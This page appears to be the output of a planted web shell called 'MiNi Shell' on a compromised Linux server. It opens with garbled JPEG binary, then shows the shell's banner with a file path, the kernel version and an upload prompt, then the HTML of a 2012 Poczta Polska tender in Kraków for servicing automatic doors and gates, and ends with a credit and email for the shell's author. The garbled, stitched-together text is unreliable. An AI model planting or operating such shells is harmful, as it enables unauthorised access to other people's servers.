JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121207/496976-N-2012.html

<p class="kh_header"><b>Kraków: Serwis i naprawy drzwi, bram i szlabanów otwieranych automatycznie</b><br>
<b>Numer ogłoszenia: 496976 - 2012; data zamieszczenia: 07.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Krakowie , ul. Westerplatte 20, 31-045 Kraków, woj. małopolskie, tel. 124222153, faks 124222153; 124229033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Serwis i naprawy drzwi, bram i szlabanów otwieranych automatycznie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
świadczenie obsługi serwisowej w zakresie stałego utrzymywania pełnej sprawności technicznej urządzeń wymienionych poniżej, poprzez:
-	prowadzenie cyklicznych przeglądów okresowych według ustalonej częstotliwości
-	usuwanie awarii wraz z wymianą uszkodzonych drobnych części wymienionych w punkcie 3 ppkt c). 

2.	Zamówienie jest podzielone na części zgodnie z przeznaczeniem dla jednostek RI Kraków i obejmuje:

-	część nr   I -  serwis drzwi, bram, szlabanu automatycznego ( Kraków, Nowy Sącz, Tarnów )  

L.p.	Rodzaj urządzenia/lokalizacja	Typ napędu	Ilość
1.	Drzwi	GEZE ECDRIVE	1
2.	Drzwi	DORMA ES 90	1
3.	Drzwi	GEZE-TSA 360	3
4.	Drzwi	DORMA ES 90	2
5	Drzwi	DORMA ES 90	2
6	Drzwi	GEZE-TSA 360	2
7	Drzwi	GEZE SLIMDRIVE	1
8	Brama Główna	CRAWFORD	1
9	Brama Stacji  Obsługi	CRAWFORD	1
10	Brama Myjni	CRAWFORD	2
11	Drzwi	GEZE ECDRIVE	1
12	Drzwi	BESAM	1
13	Drzwi	GEZE-TSA 360	1
14	Brama 	FAAC	1
15	Drzwi	BESAM	1
16	Drzwi	DORMA CS-EC2	1
17	Brama stalowa	TORH	1
18	Brama	FAAC	1
19	Drzwi	WALDOOR USW	2
20	Drzwi	WALDOOR USW	1
21	Brama	HINDI 880	1
22	Drzwi	GEZE SLIMDRIVE	2
23	Drzwi	BESAM	1
24	Brama	FAAC	1
25	Brama	BENINCA	1
26	Brama	TH 1551	1

-	część nr  II -  serwis drzwi, bram, szlabanu automatycznego ( Rzeszów, Przemyśl)  

L.p.	Rodzaj urządzenia/lokalizacja	Typ napędu	Ilość
1.	Drzwi	BESAM EMD	1
2.	szlaban	NICE SIGNO	1
3.	brama	GEZE	1
4.	brama wjazdowa	siłownik TOUSEK	1
5	drzwi	BESAM EMD	1
6	brama	FAAC model 748MP/749	1
7	drzwi stacja paliw	SLIMDRIVE SL	1
8	Brama Myjni	CRAWFORD	1
9	Brama Stacji Kontroli	CRAWFORD	2
10	Brama Stacji Obsługi	CRAWFORD	6
11	brama	CAME	1
12	szlaban	 	1
13	Brama Myjni	CRAWFORD	2
14	Brama Stacji Kontroli	CRAWFORD	2
15	Brama Stacji Obsługi	CRAWFORD	2
16	brama segmentowa (serwis w II półroczu 2013 r.) 	TSB-S	16
17	uszczelnienie bramowe (serwis w II półroczu 2013 r.)	TSU	9
18	rampa hydrauliczna (serwis w II półroczu 2013 r.)	TSU	9
19	Szlaban (serwis w II półroczu 2013 r.)	NICE SIGNO	1

3.	Zakres czynności wchodzących w skład przeglądów okresowych:
a)	Kompleksowy serwis drzwi, bram, szlabanów automatycznych wraz z ich napędem powinien być wykonywany, co 3 miesiące, czyli 4 przeglądy w okresie obowiązywania umowy (ze względu na wymagania Aprobaty Technicznej, zaleceń producenta oraz intensywności eksploatacji), za wyjątkiem WER Rudna (cz.II poz 16-19) gdzie będzie wykonany tylko 1 przegląd (serwis) w II półroczu 2013 r.
b)	W ramach serwisu, sprawdzeniu i regulacji podlegają elementy i podzespoły drzwi, bram oraz szlabanów automatycznych wskazane w zakresie czynności przeglądów okresowych z SIWZ.
c)	 Elementy urządzeń podlegające wymianie, w ramach kosztu wynagrodzenia Wykonawcy, które będzie określone w  § 3 ust 1 zawartej umowy, zostały wskazane w SIWZ i obejmują:
-	przewody elektryczne i złączki,
-	łożyska, tuleje,
-	wyłączniki, mikrowyłączniki,
-	paski napędowe (oprócz głównego pasa napędowego)
-	elementy blokujące drzwi,
-	zamki i zawiasy drzwiowe,
-	śruby, nakrętki, podkładki,
-	bezpieczniki obwodów zasilających
-	smary,
-	preparaty czyszczące i konserwujące.

4.	Miejsca lokalizacji urządzeń i realizacji usług Przedmiot zamówienia będzie realizowany w urządzeniach zlokalizowanych w jednostkach Poczty Polskiej S.A. wskazanych w SIWZ.  

5.	Warunki realizacji usług
a)	Przeglądy okresowe i usuwanie awarii urządzeń odbywać się będzie w godzinach pracy jednostek organizacyjnych Poczty Polskiej S.A., w których wymienione p-cie 2 urządzenia są eksploatowane.
b)	Przeglądy okresowe, wykonywane będą w okresach zgodnych z wymaganiami producenta dla poszczególnych typów i modeli urządzeń, jednak nie rzadziej niż raz na 3 miesiące. Dokonywanie przeglądów okresowych nie wymaga każdorazowego telefonicznego lub pisemnego ich zlecania. Przeglądy okresowe mogą być wykonywane na bieżąco np. podczas usuwania awarii.
c)	Awarie w funkcjonowaniu urządzeń zgłaszane będą do  Wykonawcy telefonicznie,  faksem lub e-mailem przez upoważnionego pracownika  Regionu Infrastruktury w Krakowie lub Rzeszowie (w sobotę przez pracownika jednostki, w której wystąpiła awaria).
d)	Wykonawca zobowiązany jest przystąpić do usunięcia awarii (tzw. czas reakcji) w ciągu 6 godzin od momentu zgłoszenia.
e)	W przypadku, gdy usunięcie awarii nie jest możliwe w ciągu 24 godzin Wykonawca jest zobowiązany do zapewnienia zastępczych elementów systemu do czasu dokonania pełnej naprawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.70.00.00-2, 50.71.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.  O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają  warunki udziału w postępowaniu wynikające z art. 22 ust. 1 ustawy p.z.p. dotyczące m.in. posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
2.  O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia w okolicznościach o których mowa w art. 24 ust. 1 ustawy p.z.p.

3. W celu potwierdzenia SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU określonych w art. 22 ust. 1 ustawy p.z.p. oraz BRAKU PODSTAW DO WYKLUCZENIA wykonawcy z postępowania o udzielenie zamówienia w okolicznościach o których mowa w art. 24 ust. 1 ustawy p.z.p zamawiający żąda następujących dokumentów: 

1)	oświadczenie o spełnianiu warunków udziału w postępowaniu 
2)	oświadczenie o braku podstaw do wykluczenia 
3)	w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy
-	   wykonawca nie będący osobą fizyczną składa aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy   wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
-	wykonawca będący osobą fizyczną nie prowadzącą działalności gospodarczej składa oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy;

4.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w  pkt  3 :
4.1 	ppkt 3) - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,

Dokumenty , o których mowa w  pkt  4.1 lit. a , powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w  pkt 4 , zastępuje się  je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Aktualność dokumentu jak wyżej.

5.   	Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia na dzień upływu terminu do składania oferty, w oparciu o informacje zawarte w dokumentach wymienionych powyżej. Z treści dokumentów musi wynikać jednoznacznie, iż warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek - dotyczący dysponowania osobami zdolnymi do wykonania zamówienia.
W celu wykazania spełniania przez wykonawcę warunku, o którym mowa powyżej, Wykonawca jest zobowiązany przedstawić:
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia oraz informacji o podstawie do dysponowania tymi osobami.
Wykonawca sporządzi wykaz wg schematu z SIWZ  i dołączy go do składanej oferty:     

Za spełnienie tego warunku Zamawiający uzna wykazanie, iż Wykonawca dysponuje co najmniej 1 osobą posiadającą właściwe kwalifikacje elektryczne tj. świadectwo kwalifikacyjne typu E.

2.	W przypadku gdy Wykonawca będzie polegał na osobach zdolnych do wykonania zamówienia innych podmiotów,  niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest przedstawić Zamawiającemu, pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji tych osób na okres wykonywania przedmiotu zamówienia.  

3.	Na potwierdzenie, że osoby wskazane w wykazie, o którym mowa w pkt. 1 posiadają  wymagane kwalifikacje,  wraz z ofertą należy złożyć oświadczenie (w oparciu o wzór z SIWZ) o posiadaniu przez te osoby stosownych kwalifikacji ,  opisanych w w/w wykazie. 

4.  Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia na dzień upływu terminu do składania oferty, w oparciu o informacje zawarte w dokumentach wymienionych powyżej. Z treści dokumentów musi wynikać jednoznacznie, iż warunek Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. INNE DOKUMENTY, które należy załączyć do oferty:
1.1.	Podpisany formularz oferty - który należy umieścić jako pierwszą stronę oferty.
1.2.	Wypełniony i podpisany  formularz cenowy - zgodnie z SIWZ.  
1.3.	Pełnomocnictwo lub upoważnienie - jeżeli dokumenty będą podpisane przez pełnomocnika firmy lub inną osobę upoważnioną - załączone w oryginale lub w postaci kopii poświadczonej notarialnie za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> RI 4 / 90 /12<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska S.A. Region Infrastruktury w Krakowie 31-045 Kraków ul. Westerplatte 20 pok. 409 IVp..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2012 godzina 11:30, miejsce: Poczta Polska S.A. Region Infrastruktury w Krakowie 31-045 Kraków ul. Westerplatte 20 pok. 409 IVp..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 20.01.2013.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Serwis i naprawy drzwi, bram i szlabanów otwieranych automatycznie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	część nr   I -  serwis drzwi, bram, szlabanu automatycznego ( Kraków, Nowy Sącz, Tarnów )  

L.p.	Rodzaj urządzenia/lokalizacja	Typ napędu	Ilość
1.	Drzwi	GEZE ECDRIVE	1
2.	Drzwi	DORMA ES 90	1
3.	Drzwi	GEZE-TSA 360	3
4.	Drzwi	DORMA ES 90	2
5	Drzwi	DORMA ES 90	2
6	Drzwi	GEZE-TSA 360	2
7	Drzwi	GEZE SLIMDRIVE	1
8	Brama Główna	CRAWFORD	1
9	Brama Stacji  Obsługi	CRAWFORD	1
10	Brama Myjni	CRAWFORD	2
11	Drzwi	GEZE ECDRIVE	1
12	Drzwi	BESAM	1
13	Drzwi	GEZE-TSA 360	1
14	Brama 	FAAC	1
15	Drzwi	BESAM	1
16	Drzwi	DORMA CS-EC2	1
17	Brama stalowa	TORH	1
18	Brama	FAAC	1
19	Drzwi	WALDOOR USW	2
20	Drzwi	WALDOOR USW	1
21	Brama	HINDI 880	1
22	Drzwi	GEZE SLIMDRIVE	2
23	Drzwi	BESAM	1
24	Brama	FAAC	1
25	Brama	BENINCA	1
26	Brama	TH 1551	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.70.00.00-2, 50.71.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Serwis i naprawy drzwi, bram i szlabanów otwieranych automatycznie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	część nr  II -  serwis drzwi, bram, szlabanu automatycznego ( Rzeszów, Przemyśl )   

L.p.	Rodzaj urządzenia/lokalizacja	Typ napędu	Ilość
1.	Drzwi	BESAM EMD	1
2.	szlaban	NICE SIGNO	1
3.	brama	GEZE	1
4.	brama wjazdowa	siłownik TOUSEK	1
5	drzwi	BESAM EMD	1
6	brama	FAAC model 748MP/749	1
7	drzwi stacja paliw	SLIMDRIVE SL	1
8	Brama Myjni	CRAWFORD	1
9	Brama Stacji Kontroli	CRAWFORD	2
10	Brama Stacji Obsługi	CRAWFORD	6
11	brama	CAME	1
12	szlaban	 	1
13	Brama Myjni	CRAWFORD	2
14	Brama Stacji Kontroli	CRAWFORD	2
15	Brama Stacji Obsługi	CRAWFORD	2
16	brama segmentowa (serwis w II półroczu 2013 r.) 	TSB-S	16
17	uszczelnienie bramowe (serwis w II półroczu 2013 r.)	TSU	9
18	rampa hydrauliczna (serwis w II półroczu 2013 r.)	TSU	9
19	Szlaban (serwis w II półroczu 2013 r.)	NICE SIGNO	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.70.00.00-2, 50.71.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com